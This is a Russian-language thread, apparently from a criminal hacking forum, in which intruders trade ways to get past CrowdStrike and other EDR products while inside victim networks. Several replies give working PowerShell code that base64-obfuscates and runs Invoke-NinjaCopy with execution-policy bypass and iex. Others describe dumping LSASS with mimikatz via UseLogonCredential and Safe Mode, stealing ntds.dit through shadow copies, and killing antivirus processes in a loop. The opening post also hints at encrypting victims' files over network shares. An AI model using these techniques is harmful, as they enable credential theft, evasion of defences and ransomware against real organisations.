• XSS.stack #1 – первый литературный журнал от юзеров форума

AV\EDR работа с edr/xdr

Отслеживать

Player_1

RAID-массив
Пользователь
Регистрация
22.05.2021
Сообщения
69
Реакции
6
Гарант сделки
2
приветствую уважаемые, может кто поделиться опытом работы в сетях с таким софтом на машинах как: crowd strike/cb/cybereason/cortex и так далее
есть шанс как-то не имея приватного софта сдампить память или регистр? память я даже не пытался, не хочу спугнуть тагрет, а регист sam сдампить они тоже не дают - в моем случае я говоро про кровд (карбон кстати изи дампится мимиком)
и допустим я сисадмин и очень переживаю, что хакеры украдут мои данные, я решил из дома зашифровать свои документы на рабочем пк используя шары - мне ведь такие звери не дадут этого сделать?
 
Интересная статью по дампу лсасса под едр
Код: 
https://medium.com/@viveik.chauhan/how-i-bypass-crowdstrike-restriction-1bc558abd464
 
Krypt0n сказал(а):
он палится
его можно и обфусцировать.
Код: 
crypt.py
raw = open('Ninja.ps1', 'r').read()
b64 = base64.b64encode(raw.encode('utf-16-le'))
open('Ninja_b64.txt', 'w').write(b64)
запускаем
Powershell -ep bypass и выполняем
Код: 
$raw = Get-Content -Path ./Ninja_b64.txt
$sisco = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($raw))
iex $sisco
А вообще все манипуляции с lsass пасёт авер. Даже если убить его lsass находится в списке хз каком под запретом.
Как выход делать UseLogonCredential 1 ребутить ждать сутки после заходим ставим декоаньку ребутим с сэйф моде дампим мимкой.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
wav сказал(а):
его можно и обфусцировать.
Код: 
crypt.py
raw = open('Ninja.ps1', 'r').read()
b64 = base64.b64encode(raw.encode('utf-16-le'))
open('Ninja_b64.txt', 'w').write(b64)
запускаем
Powershell -ep bypass и выполняем
Код: 
$raw = Get-Content -Path ./Ninja_b64.txt
$sisco = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($raw))
iex $sisco
мог написать это, в самом первом ответе)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
wav сказал(а):
его можно и обфусцировать.
Код: 
crypt.py
raw = open('Ninja.ps1', 'r').read()
b64 = base64.b64encode(raw.encode('utf-16-le'))
open('Ninja_b64.txt', 'w').write(b64)
запускаем
Powershell -ep bypass и выполняем
Код: 
$raw = Get-Content -Path ./Ninja_b64.txt
$sisco = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($raw))
iex $sisco
А вообще все манипуляции с lsass пасёт авер. Даже если убить его lsass находится в списке хз каком под запретом.
Как выход делать UseLogonCredential 1 ребутить ждать сутки после заходим ставим декоаньку ребутим с сэйф моде дампим мимкой.
вообще-то с помощью него пизжут ntds.dit
 
Krypt0n сказал(а):
вообще-то с помощью него пизжут ntds.dit
вообщето делается легче.
на системе делаешь теневую копию вытаскиваеш это одтуда, делаешь дамп реестра сливаеш себе и уже у себя вытаскиваешь хеши.
но тот способ что я описал тащит и пароли с lsass
А вообще способов куча, каждый др..т кто как хочет я др..у как я хочу ))
В инете статья есть.
10 шагов для успешной атаки на Windows Active Directory
 
Пожалуйста, обратите внимание, что пользователь заблокирован
wav сказал(а):
вообщето делается легче.
на системе делаешь теневую копию вытаскиваеш это одтуда, делаешь дамп реестра сливаеш себе и уже у себя вытаскиваешь хеши.
но тот способ что я описал тащит и пароли с lsass
А вообще способов куча, каждый др..т кто как хочет я др..у как я хочу ))
В инете статья есть.
10 шагов для успешной атаки на Windows Active Directory
я всегда так делаю, но если юзер не может управлять теневыми копиями, то invoke-ninjacopy в помощь
 
Давно не заходил, спасибо ребят за ответы, про сикретдамп тоже сам допёр когда получилось нтдс снять
wav сказал(а):
его можно и обфусцировать.
Код: 
crypt.py
raw = open('Ninja.ps1', 'r').read()
b64 = base64.b64encode(raw.encode('utf-16-le'))
open('Ninja_b64.txt', 'w').write(b64)
запускаем
Powershell -ep bypass и выполняем
Код: 
$raw = Get-Content -Path ./Ninja_b64.txt
$sisco = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($raw))
iex $sisco
А вообще все манипуляции с lsass пасёт авер. Даже если убить его lsass находится в списке хз каком под запретом.
Как выход делать UseLogonCredential 1 ребутить ждать сутки после заходим ставим декоаньку ребутим с сэйф моде дампим мимкой.
Это жеж бред уже енкодить в бэйс, есть более интересные тулзы для обфускации повершелла "invoke-obfuscation" в гугл, но команды то один хрен будут декодиться и в процессе выполнения будут убиты авером (нормальным +-)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Player_1 сказал(а):
Давно не заходил, спасибо ребят за ответы, про сикретдамп тоже сам допёр когда получилось нтдс снять

Это жеж бред уже енкодить в бэйс, есть более интересные тулзы для обфускации повершелла "invoke-obfuscation" в гугл, но команды то один хрен будут декодиться и в процессе выполнения будут убиты авером (нормальным +-)
эту тулзу знают все ав, так что даже если сделаешь обфускацию. то ав его моментально убьет
 
Krypt0n сказал(а):
эту тулзу знают все ав, так что даже если сделаешь обфускацию. то ав его моментально убьет
Да мелят сами не понятно чё. Они уже давно в бд аверов, хоть какой там метод выбирай давно умер этот метод.
ps. Был случай на этом ав. запускаю киллер ав и он палит софтину что она пытается чёто выполнить. запускаю в цикле батником через pskill софтину она сносит на пару секунд процесс и снова появляется но дал запустить мой киллер и вуаля всё здампилось.
 
Последнее редактирование:
А что делать в той ситуации когда у тебя пользователь угнетен по правам на устройстве хуже муровья и у тебя ав crowdstrike чпокает все во все щели?
Есть ли какие то обходы данной ситуации и как повысить в таком случае права хотя бы до человеческих?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх